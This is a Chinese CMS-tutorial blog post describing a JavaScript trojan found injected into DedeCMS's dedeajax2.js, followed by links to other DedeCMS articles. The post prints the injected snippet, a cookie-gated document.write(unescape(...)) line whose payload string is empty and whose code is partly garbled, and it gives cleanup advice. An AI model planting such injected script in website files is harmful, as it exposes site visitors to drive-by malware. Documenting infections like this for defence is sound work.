dedecms:dedeajax2.js被植入js木马
所属分类:
CMS教程 / dedecms
阅读数:
1588
收藏 0赞 0分享
这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下:
//初始化xmldom
function InitXDom(){
if(DedeXDOM!=null) return;
var obj = null;
if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox
var parser = new DOMParser();
obj = parser.parseFromString(xmlText, "text/xml");
} else { // IE
try { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }
if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }
}
DedeXDOM = obj;
};
//以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}
用原版本的dedeajax2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。
不过建议大家,多注意dedecms的官方补丁,unix服务器的站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。
关键字描述:木马 obj " if new // null var dede 植入
织梦DedeCms取消后台登陆验证码的方法示例
经常建站和做优化的站长朋友们都很清楚网站的优化和客户体验度是永远需要排在第一位的,这篇文章主要介绍了织梦DedeCms取消后台登陆验证码的方法示例,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
收藏 0赞 0分享
加快织梦dedeCMS内容生成速度方法
最近有位站长朋友咨询一个十几万数据的DedeCMS系统,发现用Dedecms生成速度,慢的跟蜗牛一样,CPU达到100%,有时候半天都不动。这让大数据的网站的站长非常头疼,下面为大家解决这个问题
收藏 0赞 0分享
dedecms织梦模板里显示当前登录会员名
有时我们只是需要在网站某个地方显示一下当前登录的会员名字,这篇文章主要介绍了dedecms织梦模板里显示当前登录会员名,非常具有实用价值,需要的朋友可以参考下
收藏 0赞 0分享
dedecms织梦模板中plus文件作用介绍及安全设置详解
很多新手用户在使用织梦CMS程序过程中,难免会碰到挂马中毒现象,所以事先我们要对网站及服务器安全做好预防备份处理,这篇文章主要介绍了dedecms织梦模板中plus文件作用介绍及安全设置详解,感兴趣的小伙伴们可以参考一下
收藏 0赞 0分享
详解dedecms后台编辑器将回车<br>改为<p>的方法
DEDECMS编辑器默认回车[确认键]是返回<br />这样的。有时候我们需要返回<p> </p>这样的,今天我们就讲讲后台编辑器将回车将<br>改为<p>的有效教程吧,感兴趣的小伙伴们可以参考一下
收藏 0赞 0分享
解决dedecms多域名和站点的绑定的问题
dedecms可以实现多级域名,不同域名的绑定.这篇文章主要介绍了解决dedecms多域名和站点的绑定的问题,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
收藏 0赞 0分享
DedeCMS调用相关文章likearticle附加自定义字段
DedeCMS非常灵活,可以根据关键词、文章标题调用文章,以提高内容之间的相关度,提高页面权重。这篇文章主要介绍了DedeCMS调用相关文章likearticle附加自定义字段,非常具有实用价值,需要的朋友可以参考下
收藏 0赞 0分享
